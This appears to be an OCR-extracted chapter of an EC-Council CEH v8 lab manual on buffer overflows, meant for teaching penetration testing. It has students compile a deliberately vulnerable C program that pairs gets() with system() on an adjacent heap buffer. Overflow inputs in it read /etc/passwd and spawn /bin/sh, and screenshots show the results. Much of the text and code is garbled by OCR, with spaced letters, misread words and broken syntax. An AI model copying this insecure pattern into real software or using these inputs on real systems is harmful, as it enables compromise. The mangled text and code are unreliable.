Ceh v8 labs module 18 buffer overflow

C E H L a b M a n u a l

B u f f e r O v e r f l o w

M o d u l e 1 8

Module 18 - Buffer Overflow

B u f f e r O v e r f l o w A t t a c k

In a buffer overflow, while writing data to a biffer, the b/ffer’s boundary is overrun and adjacent memory is overwritten.Lab ScenarioS o u r c e : h t t p : / / w w w . 1 c . u 1 1 i c a 1 1 1 p . b r / ~ - s t o l f i / u r n a / b u t f e r - o f l o w

H a c k e r s c o n t i n u o u s l y l o o k t o r v u l n e r a b i l i t i e s 1 1 1 s o f t w a r e o r a c o m p u t e r t o b r e a k i n t o

t h e s y s t e m b y e x p l o i t i n g t h e s e v u l n e r a b i l i t i e s .

T h e m o s t c o m m o n v u l n e r a b i l i t y o f t e n e x p l o i t e d is d i e b u f f e r o v e r f l o w a t t a c k , w h e r e

a p r o g r a m f a i l u r e o c c u r s e i t h e r 1 1 1 a l l o c a t i n g s u f f i c i e n t m e m o r y f o r a n i n p u t s t r i n g o r

1 1 1 t e s t i n g d i e l e n g d i o f s t r i n g i f i t l i e s w i t h i n i t s v a l i d r a n g e . A h a c k e r c a n e x p l o i t s u c h

a w e a k n e s s b y s u b m i t t i n g a n e x t r a - l o n g i n p u t t o t h e p r o g r a m , d e s i g n e d t o o v e r f l o w

i t s a l lo c a t e d i n p u t b u f f e r ( t e m p o r a r y s t o r a g e a r e a ) a n d m o d i f y t h e v a lu e s o f n e a r b y

v a r ia b le s , c a u s e t h e p r o g r a m t o j u m p t o u n i n t e n d e d p la c e s , o r e v e n r e p la c e t h e

p r o g r a m 's i n s t m c t i o n s b y a r b i t r a r y c o d e .

I f t h e b u f f e r o v e r f l o w b u g s l i e 1 1 1 a n e t w o r k s e r v ic e d a e m o n , t h e a t t a c k c a n b e d o n e

b y d i r e c d y f e e d i n g t h e p o i s o n o u s i n p u t s t r i n g t o t h e d a e m o n . I f t h e b u g l i e s 1 1 1 a n

o r d i n a r y s y s t e m t o o l o r a p p l i c a t i o n , w i t h n o d i r e c t a c c e s s , t h e h a c k e r a t t a c h e s t h e

p o i s o n o u s s t r i n g w i d i a d o c u m e n t o r a n e m a i l w h i c h , o n c e o p e n e d , w i l l l a u n c h a

p a s s iv e b u f f e r o v e r f l o w a t t a c k . S u c h a t t a c k s a r e e q u i v a l e n t t o a h a c k e r l o g g i n g i n t o

t h e s y s t e m w i d i d i e s a m e u s e r I D a n d p r i v i l e g e s a s d i e c o m p r o m i s e d p r o g r a m .

B u f f e r o v e r f l o w b u g s a r e e s p e c ia l ly c o m m o n 1 1 1 C p r o g r a m s , s in c e t h a t la n g u a g e

d o e s n o t p r o v i d e s b u i l t - i n a r r a y b o u n d c h e c k i n g , a n d u s e s a f i n a l n u l l b y t e t o m a r k

t h e e n d o t a s t r i n g , in s t e a d o f k e e p in g i t s l e n g t h 1 1 1 a s e p a r a t e f i e l d . T o m a k e d u n g s

w o r s e , C p r o v i d e s m a n y l i b r a r y f u n c t i o n s , s u c h a s s t r c a t a n d g e t l i n e , w h i c h c o p y

s t r i n g s w i t h o u t a n y b o u n d s - c h e c k in g .

A s a n e x p e r t ethical hacker a n d penetration te s te r, y o u m u s t h a v e s o u n d

k n o w l e d g e o f w h e n a n d h o w b u f f e r o v e r f l o w o c c u r s . Y o u m u s t u n d e r s t a n d stacks- based a n d heap-based b u f f e r o v e r f l o w s , p e r f o r m penetration te s ts f o r d e t e c t i n g

b u f f e r o v e r f l o w s 1 1 1 p r o g r a m s , a n d t a k e p r e c a u t i o n s t o prevent p r o g r a m s f r o m

b u f f e r o v e r f l o w a t ta c k s .

Lab ObjectivesT h e o b j e c t i v e o f t i n s l a b is t o h e l p s t u d e n t s t o l e a r n a n d p e r f o r m b u f f e r

o v e r f l o w a t t a c k s t o e x e c u t e p a s s w o r d s .

1 1 1 t i n s l a b , y o u n e e d t o :

■ P r e p a r e a s c r i p t t o o v e r f l o w b u f f e r

■ R u n t h e s c r i p t a g a in s t a n a p p l i c a t i o n

ICON KEY

V a lu a b lein to rm a d o a ________

T e s t yo u r k n o w le d g e

s A W e b exercise

m W o r k b o o k r e v ie w

Ethical Hacking and Countermeasures Copyright © by EC-CouncilAll Rights Reserved. Reproduction is Strictly Prohibited.

C EH Lab Manual Page 902

http://www.1c.u11ica111p.br/~-stolfi/urna/butfer-oflow


■ P e r f o r m p e n e t r a t i o n t e s t i n g f o r t h e a p p l i c a t i o n

■ E n u m e r a t e a p a s s w o r d l i s t

Lab Environment■ A c o m p u t e r r u n n i n g w i t h Windows Server 2012 a s H o s t m a c h in e

■ A V i r t u a l M a c h i n e r u n n i n g w i t h Back Track 5 R3

■ A w e b b r o w s e r w i t h I n t e r n e t a c c e s s

■ A d m i n i s t r a t i v e p r i v i l e g e s t o 1 1 1 1 1 t o o l s

Lab DurationT i m e : 2 0 A J in u t e s

Overview of Buffer OverflowB u f f e r o v e r f l o w is a n a n o m a l y w h e r e a p r o g r a m , w h i l e w n t i n g d a t a t o a b u f f e r ,

o v e r r u n s t h e b u f f e r ' s b o u n d a r y a n d o v e r w r i t e s a d j a c e n t m e m o r y . T i n s is a s p e c ia l

c a s e o f v i o l a d o n o f m e m o r y s a f e ty . B u t t e r o v e r d o w s c a n b e t r i g g e r e d b y i n p u t s d i a t

a r e d e s i g n e d t o e x e c u t e c o d e , o r a l t e r t h e w a y t h e p r o g r a m o p e r a t e s . T i n s m a y r e s u l t

1 1 1 e r r a t i c p r o g r a m b e h a v io r , i n c l u d i n g m e m o r y a c c e s s e r r o r s , i n c o r r e c t r e s u l t s , a

c r a s h , o r a b r e a c h o f s y s t e m s e c u r i t y . T h u s , t l i e v a r e t h e b a s is o f m a n y s o f t w a r e

v u l n e r a b i l i t i e s a n d c a n b e m a l i c i o u s l y e x p l o i t e d .

Lab TasksR e c o m m e n d e d la b s t o a s s is t y o u 1 1 1 b u f f e r o v e r f l o w :

■ E n u m e r a t i n g P a s s w o r d s 1 1 1 “ D e f a u l t P a s s w o r d L i s t ”

o W r i t e a C o d e

o C o m p i l e d i e C o d e

o E x e c u t e t h e C o d e

o P e r f o r m B u f f e r O v e r f l o w A t t a c k

o O b t a i n C o m m a n d S h e l l

Lab AnalysisA n a l y z e a n d d o c u m e n t t h e r e s u l t s r e la t e d t o t h e l a b e x e r c is e . G i v e y o u r o p i n i o n o n

y o u r t a r g e t ’ s s e c u r i t y p o s t u r e a n d e x p o s u r e .

& This lab can be dem onstrated using B acktrack Virtual M achine

2* TASK 1

Overview

P L E A S E T A L K T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S R E L A T E D T O T H I S L A B .

Ethical Hacking and Countermeasures Copyright © by EC-CouncilAll Rights Reserved. Reproduction is Stricdy Prohibited.


Module 17 - Buffer O verflow

B u f f e r O v e r f l o w E x a m p l e

In a b/rffer oveijlow, while writing data to a b/rffer, the buffer's boundary is overrun and adjacent ■memory is overwritten.Lab Scenario1 1 1 c o m p u t e r s e c u r i t y a n d p r o g r a m m i n g , a b u f f e r o v e r f l o w , 0 1 b ־ u f f e r o v e r r u n ,

v u l n e r a b i l i t y a p p e a r s w h e r e a n a p p l i c a t i o n n e e d s t o r e a d e x t e r n a l i n f o r m a t i o n s u c h a s

a c h a r a c t e r s t r i n g , t h e r e c e i v i n g b u t t e r is r e l a t i v e l y s m a l l c o m p a r e d t o t h e p o s s i b le

s iz e o f d i e i n p u t s t r i n g , a n d t h e a p p l i c a t i o n d o e s n ' t c h e c k t h e s iz e . T l i e b u f f e r

a l lo c a t e d a t r u n - t i m e is p l a c e d 0 1 1 a s t a c k , w h i c h k e e p s t h e i n f o r m a t i o n f o r e x e c u t i n g

f u n c t i o n s , s u c h a s l o c a l v a r ia b le s , a r g u m e n t v a r ia b le s , a n d t h e r e t u r n a d d r e s s . T l i e

o v e r f l o w i n g s t r i n g c a n a l t e r s u c h i n f o r m a t i o n . T i n s a ls o m e a n s t h a t a n a t t a c k e r c a n

c h a n g e t h e i n f o r m a t i o n a s h e 0 1 s ־ h e w a n t s t o . F o r e x a m p l e , t h e a t t a c k e r c a n i n j e c t a

s e r ie s o f m a c h i n e la n g u a g e c o m m a n d s a s a s t r i n g d i a t a ls o le a d s t o t h e e x e c u t i o n o f

t h e a t t a c k c o d e b v c h a n g in g t h e r e t u r n a d d r e s s t o t h e a d d r e s s o f t h e a t t a c k c o d e . T l i e

u l t i m a t e g o a l is u s u a l l y t o g e t c o n t r o l o f a p r i v i l e g e d s h e l l b y s u c h m e t h o d s .

P r o g r a m m i n g la n g u a g e s c o m m o n l y a s s o c ia t e d w i d i b u f f e r o v e r f l o w s i n c l u d e C a n d

C + + , w h i c h p r o v i d e 1 1 0 b u i l t - i n p r o t e c t i o n a g a in s t a c c e s s in g 0 1 o ־ v e r w r i t i n g d a t a 1 1 1

a n y p a r t o f m e m o r y a n d d o n o t a u t o m a t i c a l l y c h e c k d i a t d a t a w r i t t e n t o a n a r r a y ( t h e

b u i l t - i n b u f f e r t y p e ) is w i d i i n t h e b o u n d a r ie s o f d i a t a r r a y . B o u n d s c h e c k i n g c a n

p r e v e n t b u f f e r o v e r f l o w s .

A s a penetration teste r, y o u s h o u l d b e a b le t o i m p l e m e n t p r o t e c t i o n a g a in s t s t a c k -

s m a s lu n g a t t a c k s . Y o u m u s t b e a w a r e o f a l l d i e d e f e n s i v e m e a s u r e s f o r b u f f e r

o v e r f l o w a t t a c k s . Y o u c a n p r e v e n t b u f f e r o v e r f l o w a t t a c k s b y i m p l e m e n t i n g 1 1 1 1 1 -

t i m e c h e c k s , a d d r e s s o b f u s c a t i o n , r a n d o m i z i n g l o c a t i o n o f f u n c t i o n s 1 1 1 l i b c ,

a n a l y z in g s t a t i c s o u r c e c o d e , m a r k i n g s t a c k a s 1 1 0 1 1 - e x e c u t e , u s i n g t y p e s a fe la n g u a g e s

s u c h a s J a v a , M L , e t c .

Lab ObjectivesT h e o b j e c t i v e o f t i n s l a b is t o h e l p s t u d e n t s t o l e a r n a n d p e r f o r m b u f f e r

o v e r f l o w t o e x e c u t e p a s s w o r d s .

1 1 1 t i n s l a b , y o u n e e d t o :

I C O N K E Y

/ V a lu a b lein fo rm a t io n

y* T e s t y o u rk n o w le d g e

s W e b exercise

m W o rk b o o k r e v ie w




■ P r e p a r e a s c r i p t t o o v e r f l o w b u f f e r

■ R u n t h e s c r i p t a g a in s t a n a p p l i c a t i o n

■ P e r f o r m p e n e t r a t i o n t e s t i n g f o r t h e a p p l i c a t i o n

■ E n u m e r a t e a p a s s w o r d l i s t

Lab Environment■ A c o m p u t e r r u n n i n g w i t h Windows Server 2012 a s H o s t m a c h in e

■ A Y i r m a l M a c h i n e r u n n i n g w i t h Back Track 5 R3

■ A w e b b r o w s e r w i t h Internet a c c e s s

■ Administrative privileges to run tools

Lab DurationT i m e : 2 0 M i n u t e s

Overview of Buffer OverflowB u f f e r o v e r f l o w t a k e s p la c e w h e n d ata w r i t t e n t o a buffer b e c a u s e o f i n s u f f i c i e n t

b o u n d s c h e c k i n g corrupts t h e d a t a v a lu e s 1 1 1 memory ad d resses , w h i c h a r e

a d j a c e n t t o t h e allocated b u f f e r . M o s t o f t e n t h is o c c u r s w h e n c o p y i n g strings o f

c h a r a c t e r s f r o m one buffer to another.

W hen die following program is compiled and run, it will assign a block o t memory11 bytes long to hold die attacker string, strcpy function will copy the string “ D D D D D D D D D D D D D D ” into an attacker string, which will exceed the buffer size o f 11 bytes, resulting 111 buffer overflow.

0 1 2 3 4 5 6 7 8 9 10 1112 D D D D D D D D D D D D \ o String

3 4 5 6 7 8 9 10

A A A A A A A A A A \0■ci1 2 3 4 S7 6״

Buffer Overflow Example Code#include<stdio.h>int main ( int argc, char * *argv)

{char Bufferfll] =״AAAAAAAAAA״; strcpylBuffer/DDDDDDDDDODD״}; printf( “96 \n״. Buffer); return 0;}

This type o f vulnerability is prevalent in UNIX• and NT-based systems

Lab Tasks1. Launch your Back Track 5 R3 Virtual Machine.

2. For btlogui, type root and press Enter. Type the password as toor, and press Enter to log 111 to BackTrack virtual machine.

I T This lab can be dem onstrated using B acktrack Virtual Machine

S TASK 1

Write a Code

Ethical Hacking and Countenneasures Copyright © by EC-CouncilAll Rights Reserved. Reproduction is Stricdy Prohibited.



R־ TBackTrack on WIN 2N9STOSGIEN Virtual Machine Connection * ״kVia Clipboard View י

@ 3 h ►וו 1 פ i . 0933761 HET: Registered protocol fanily 171.0915311 input: AT Translated Set 2 keyboard as /dc1;iccs platfor1v'i8l>12/'scrio0/input/'inputl1.0952761 Registering the dns resolver key type1.0957031 registered taskstats version 11.1639921 Magic nunber: 12:12U:12G1.1644561 acpi device:01: hash notches1.105658) rtc.cnos 00:02: setting syste* clock to 2012-09-25 11:06:59 UTC (1340571219)1.165468) BIOS EDO fa c il ity v0.16 2004-Jun-25, 0 devices found1.1658621 COD information not available.1.2378181 ata l.06: ATA-8: Uirtual HD, 1 .1 .0 , raax MUDMA2 1.2389361 ata l.06: 33554432 scctors, nu lti 12B: LBA481.2415511 ata2.06: AIAPI: Uirtual CD, , wax hUDt1A21.2432671 ata2.06: configured for MUDI1n21.2441181 ata l.06: configured for flUDHflZ1.244223) sc s i 0:0:0:6: Direct-Access ATA Uirtual HO 1 .1 . PQ: 6 AMSI: 51.2451571 sd 0:0:0:0: Isdal 33554432 512-byte logical blocks: (17.1 GB/16.0׳ GiB)1.2455461 sd 0:0:0:0: Isdal 4096-hyte physical blocks1.245974) sd 0:0:0:0: Isdal Write Protect Is o ff 1.2463841 sd 0:0:0:0: Attached scsi generic sgO type 01.2468141 sd 0:0:0:0: Isdal Urite cache: enabled, read cache: enabled, doesn't support DPT nr FIX1.2404231 sc s i 1:0:0 0: CD ROM Hsft Uirtual CD/ROM 1.0 PQ: 6 ANSI 51.2515061 sr6: scsi3 nnc drive: 0x/0 k tray1.2526091 cdron: Uniform CD HUM driver Revision: 3.261.2527931 sr 1:0:0:0: Attached scsi generic sg l type 51.25U657) sda: sdal r,da2 < xda5 >1.2506591 *d 0:0:0:0: Inda I Att<1ch«d 8C5I disk 1.260263) Freeing uiuisimI kernel mmnnj; 96Hk rrixd 1.2608041 Urite protectI1M| the karnal read only data: 1228Hk 1.26S6241 Freeing unused kernel Mwinj: 1732k freed 1.2699051 Freeing unused kernel »e1*nr1j: 1492k freed

ling, please w ait. . .1.2873151 udcv: starting version 1511.2962U0I udevd (03): /•prot/׳U3/oun adj is deprecated, please use /proc/tlJ/wn score adj instead.1.3963921 Floppy drive(s): fdO is 1 .44f1 1.41 HH4 I FDC 6 is an 02070.2.02030?) Refined T8C clocksource calibration: 3692.970 fti׳־..

F IG U R E 1.1: BackTrack Login

3 . T y p e sta rtx t o l a u n c h d i e G U I .

1-1°BackTrack on WIN-2N9STOSGIEN Virtual Machine Connection־ ־*■ Re I.V44 CSpbeard VieI't •> (- © 3 11 1► h

__ Buffer overflow occurswhen a program or process tries to store more data in a buffer.

1.24S974I sd 0:0:6:6: (sdal Urite Protect Is o ff 1.246384) sd 0:0:6:6: Attached scsi generic sy6 type 61.2468141 sd 0:0:6:6: Isdal Urite cache: enabled, read cache: enabled, doesn't support DP0 or FU11.2404231 scsi 1:6:6:0: CD ROM Msft Uirtual CD-ROM 1 0 PQ: 6 AMSI: 5l.25150bl sr6: scsi3 x tray־rwc drive: 0x/0־1.2526091 cdrm: Uniforn CD-W* driver Revision: 3.201.2527931 sr !:0:6:6: Attached scsi generic sy l type 5 I .2586571 sda: sdal sda2 < sda5 >1.2506591 sd 0:0:6 6: (sdal Attaclied SCSI disk 1.2602631 Freeing unused kernel ncmury: 'J6Uk freed 1 .2608041 N rite protecting the kernel read-only data: 122IMIk 1.265624) Frrelny umis.d kern■• I fiiMitry: 1732k freed 1.269985) Freeing unused kern•I nonary: 1492k freed

ading, please u a i t . . .1.2873151 udev: starting version 1511.29620BI udevd (83): /׳prc!c/H3/’0«jr»_<1dj is deprei^ted, please use /proc/G3׳׳o«1*»_score_adj instead.1.3963921 Floppy drive(s): fd6 is 1.440 1.4133841 FK 6 la an H2678.2.0203071 R.rfl1» d TSC clocksource calibration: 3692 .970 MHz.

cklrack 5 IQ - 64 Bit bt t ty l

y la tined out after 60 seconds.

System information as of Iuc Sep 25 16:45:47 1ST 2012

Systea load: 0.08 Processes: 72Usage of ✓: 72.3* of 15.23GB Users logged In: 0Oenortj usage: 35׳׳ IP address for eth6: 10.0.0.14Swap usage: Ok

Graph this data and ■nrvvjr th is syste* ot https:/✓landscape.canonical .con✓

F IG U R E 1.2: BackTrack G U I Login-Startx Command

4 . BackTrack 5 R3 G U I d e s k t o p o p e n s , a s s h o w n i n d i e f o l l o w i n g s c r e e n s h o t .

m Code w hich is entered in kedit is case-sensitive.




F IG U R E 1.3: BackTrack 5 R3 Desktop

5 . S e le c t t h e BackTrack Applications m e n u , a n d t h e n s e le c t A ccessories gedit Text Editor.

ל /Mem (»_J

* ^ Oik uwg* Analyzer ^ oedlt Tfcxt Editor

| TWmlrwl

ס Tkrminator

y־ t. > r*

*v^ BackTtock 4 &#***%£ internet

flPlomce)14 otherWK Sound 6 V deo 0 System Tools

<< b a ck trackca Programming languages commonly associated w ith buffer overflows include C and C + + .

F IG U R E 1.4: Launching gedit Text Editor

6. E n t e r d i e f o l l o w i n g c o d e 1 1 1 g e d i t T e x t E d i t o r (Note: t h e c o d e i s c a s e -

s e n s i t i v e ) .

# i n c l u d e < s t d i o . h> v o i d m a i n ()

{c h a r *name;c h a r *command;name=(char * ) m a l l o c (10);command=(char * )m a l l o c (128) ;p r i n t f ( " a d d r e s s o f name i s : %d\n",name);p r i n t f ( " a d d r e s s o f command i s : %d\n",command);p r i n t f ( " D i f f e r e n c e be tween a d d r e s s i s : %d\n", command-




name);p r i n t f (" E n t e r your nam e: " ) ; g e t s ( n a m e ) ;p r i n t f ("H e l lo %s\n",name) ; system(command) ;

}g ־ v x *unsaved Document 1 <׳׳ e d it

File Edit View Search Tools Documents Help

^ ^ ^ J o p e n ▼ ^ _ S a v e Undo ^ 9kn *Unsaved Document 1 X

# 1 nclude<std1 0 .h> void main(){char •name;char •command;name=(char * )m a llo c (1 0 );command=(char * )m a llo c (1 28 );p r in tf ("ad d re ss of name is : %d\n",name);p r in tf ("ad d re ss of command is:%d\n",command);p r in t f ( “D iffe ren ce between address i s :%d\n“ ,command-name);p r in t f ( "E n te r your name:“ ) ;gets(nam e);p r in t fC ’H e llo %s\n",name); system( command);

Plain Text ▼ Tab Width: 8 ▼ Ln 15, Col 2

F IG U R E 1.5: W riting code fo r execution

7 . N o w s a v e d i e p r o g r a m b y s e l e c t i n g File ־־) Save As־) root o r s i m p l y c l i c k

Save a s s h o w n 1 1 1 t h e f o l l o w i n g s c r e e n s h o t s c r e e n s h o t a s b u f f e r . c .

__ _* *Unsaved Document 1 ־ gedit

File Edit View Search Tools Documents Help

N o w la u n c h d i e c o m m a n d t e r m i n a l a n d c o m p i l e d i e code b y running:

gc c b u f f e r . c - o b u f f e r

Ii=y1 Code is compiled using the following commend: gee buffer.c biiffer.

ט N o tool can solve completely die problem o f buffer overflow, but die)׳■ surely can decrease the probability o f stack smashing attacks.

Compile th e Code




/v v x root@bt: -

File Edit View Terminal Helproot@bt: #־־ |gcc b u ffe r.c -0 b u ffe rf j

F IG U R E 1.7: BackTrack compiling the code

9 . I f t h e r e a r e a n y e r r o r s , ignore t h e m .

/v v X r o o t c a b t : -

File Edit View Terminal Helpro o tg b t:-# gcc b u ffe r .c ■0 b u ffe rb u ffe r .c : In func tion 'm a in ': —b u f fe r .c :6 : warning: incom patible im p l ic i t d e c la ra tion o f b u itfs tlH ^ u n c tio n ‘ mal loc 1 •—— ׳ —b u f fe r .c :8 : warning: format '%d' expects type 1 " n־ t ' , but a rgum ent^'ttss type 'ch a r • ׳b u ffe r .c :9 : warning: format '%d' expects type , i n j ^ o u t argument 2 jM F ty p e *ch a r » ' gb u f fe r .c : 1 0 : warning: format '%d' expects type ' i n t ׳ , but argum ent# has type ' I ong i n t '/tm p/ccx6Y3vl.o: In func tion m ain ':b u ffe r .c : ( .tex t+6x90 ): warning: the ge ts ' func tion is dangerous a n ^ t a u ^ ^ io t be used. root@bt:~# [ ]

: b a c k I t r a c k

F IG U R E 1.8: BackTrack E rror Message W indow

1 0 . T o e x e c u t e t h e p r o g r a m t y p e . /buffer

The program executes using following command: .!buffer

— j

E xecute the Code

Ethical Hacking and Countemieasures Copyright © by EC-CouncilAll Rights Reserved. Reproduction is Stricdy Prohibited.



~ :root@bt * ־־File Edit View Terminal Helpro o tg b t: •־# | . /b u f fe r | address o f name is : 20144144 address o f command i s :20144176 D iffe rence between address is :32 1Enter your name:|

■

. b a c k t r a c k ^ )1ם

m A n executable program on a disk contains a set o f binary instructions to be executed by die processor.

F IG U R E 1.9: BackTrack Executing Program

1 1 . T y p e a n y n a m e 1 1 1 d i e Input h e l d a n d p r e s s Enter; h e r e , u s i n g Ja so n a s a n

example.v x root@ bt: - »

File Edit View Terminal Helproot@bt:~# . /b u f fe r

20144144 : address o f name is 26144176:address o f command i s

32: D iffe rence between address is | as:|נEnter your name

b a c k I t r a c kca Buffer overflows w ork by manipulating pointers (including stored addresses).

F IG U R E 1.10: Inpu t Field

12. Hello Ja so n s h o u ld b e p r i n t e d .




v x r o o t @ b t: - / \

File Edit View Terminal Helproot@bt:~# ./bu ffer

26144144 : address of name is 20144176:address o f command i s

32: D iffe rence between address is Enter your name: Jason

oot®bt:~# fl״

b a c k I t r a c k

F IG U R E 1.11: H ello Jason

1 3 . N o w , o v e r f l o w t h e b u f f e r a n d e x e c u t e t h e l i s t e d s y s t e m c o m m a n d s .

1 4 . R u n d i e p r o g r a m a g a in b y t y p i n g ./buffer.

1 5 . T y p e 12345678912345678912345678912345cat /e tc /p a s s w d 111 t l i e

Input h e ld .

1 6 . Y o u c a n v i e w a p r i n t o u t o f d i e p a s s w o r d h ie .

a v א r o o t @ b t : -

File Edit View Terminal Helproot@bt:~# ./bu ffer address of name is : 17747984 address of command i s :17748016 D iffe rence between address is :32Enter your name:|12345678912345678912345678912345cat /etc/passwd|Hello 12345678912345678912345678912345cat /etc/passwdroo t:x :e :0 : roo t: / roo t: /bin/bashdaemon:x :1 :1 :daemon:/us r/sb in : /bin/shbin:x:2:2:bin:/bin:/bin/shsys: x :3 :3 : sys: /dev:/bin/shsync:x :4 :65534:sync: /b in : /b in /syn cgames:x :5 : 60:games:/us r/games: /bin/shman:x :6 : 1 2 :man: /va r/cache/man: /b in /s hIp :x : 7 :7 : Ip : /v a r /s p o o l/ lp d : /b in /s hm a il: x^S: 8 : m a il: /va r/m aiU/bin/sh _news: x t : 9: news: /va r/spojj/news: /tj^n/shg

luiicp: x :1e : l e : ifticjfc/var/spdol/uucp ijrbinTMf proxy :x: 13:13:proxy:/b1n:/b1n/sh ILwwdata:x:33:33:www-data:/var/ww\*/binft(l I Ibackup:x :34:34:backup: /var/backupf/b in/sh U s t :x :3 8 :3 8 :H a ilin g L is t H anager:/var/lis t:/b in/sh i re :x :39:39:i red :/va r/run/i red: /bin/shgnats:x :41 :4 l:Gnats Bug-Reporting System (adm in ):/var/lib/gnats:/b in/sh

( lib u u id :x :100:161::/ v a r/ lib / lib u u ld :/bin/sh

F IG U R E 1.12: Executing Password

1 7 . N o w , o b t a i n a C o m m a n d S h e l l .

1 8 . R u n d i e p r o g r a m a g a in ./buffer a n d t y p e

12345678912345678912345678912345/ b i n / s h 111 the Input field.

B T A S K 4

Perform Buffer Overflow A ttack

Buffer overflow vulnerbililties typically occur in code that a programmer cannot accratelv predict buffer overflow behvior.

■m. T A S K 5

Obtain Command Shell

Ethical Hacking and Countenneasures Copyright © by EC-CouncilAll Rights Reserved. Reproduction is Stricdy Prohibited.



/v v x root@bt: -

File Edit View Terminal Helproot@bt:~# . /b u f fe r address o f name is : 24616976 address o f command i s :24617008 D iffe rence between address is :32Enter your nameJ12345678912345678912345678912345/bm/sh|H e llo 12345678912345678912345678912345/bin/shsh-4.1#sh-4.1#sh-4.1# [ ]

b a c k t r a c k

F IG U R E 1.13: Executing 12345678912345678912345678912345/bin/sli

1 9 . T y p e Exit 1 1 1 S h e l l K o n s o l e 0 1 c ־ lo s e t h e p r o g r a m .

Lab AnalysisA n a l y z e a n d d o c u m e n t d i e r e s u l t s r e la t e d t o d i e l a b e x e r c is e . G i v e y o u r o p i n i o n 0 1 1

y o u r t a r g e t ’ s s e c u r i t y p o s t u r e a n d e x p o s u r e .

m Code scrutiny (writing secure code) is die best possible solution to bufferflow attacks.

T o o l / U t i l i t y I n f o r m a t i o n C o l l e c t e d / O b j e c t i v e s A c h i e v e d

B u f f e r O v e r f l o w

■ A d d r e s s o f n a m e is : 2 4 6 1 6 9 7 6

■ A d d r e s s o f c o m m a n d is : 2 4 6 1 7 0 0 8

■ D i f f e r e n c e b e t w e e n a d d r e s s is : 3 2

■ E n t e r y o u r n a m e :

1 2 3 4 5 6 7 8 9 1 2 3 4 5 6 7 8 9 1 2 3 4 5 6 7 8 9 1 2 3 4 5 / b i n / s h

■ H e l l o

1 2 3 4 5 6 7 8 9 1 2 3 4 5 6 7 8 9 1 2 3 4 5 6 7 8 9 1 2 3 4 5 / b i n / s h

י s h - 4 . 1 #

י s h - 4 . 1 #

י s h - 4 . 1 #

P L E A S E T A L K T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S R E L A T E D T O T H I S L A B .



Questions1. E v a l u a t e v a r i o u s m e t h o d s t o p r e v e n t b u f f e r o v e r f l o w .

2 . A n a l y z e h o w t o d e t e c t r u n - t i m e b u f f e r o v e r f l o w .

3 . E v a l u a t e a n d l i s t t h e c o m m o n c a u s e s o f b u f f e r - o v e r f l o w e r r o r s u n d e r

. N E T la n g u a g e .

I n t e r n e t C o n n e c t i o n R e q u i r e d

D Y e s 0 N o

P l a t f o r m S u p p o r t e d

0 C l a s s r o o m 0 ! L a b s

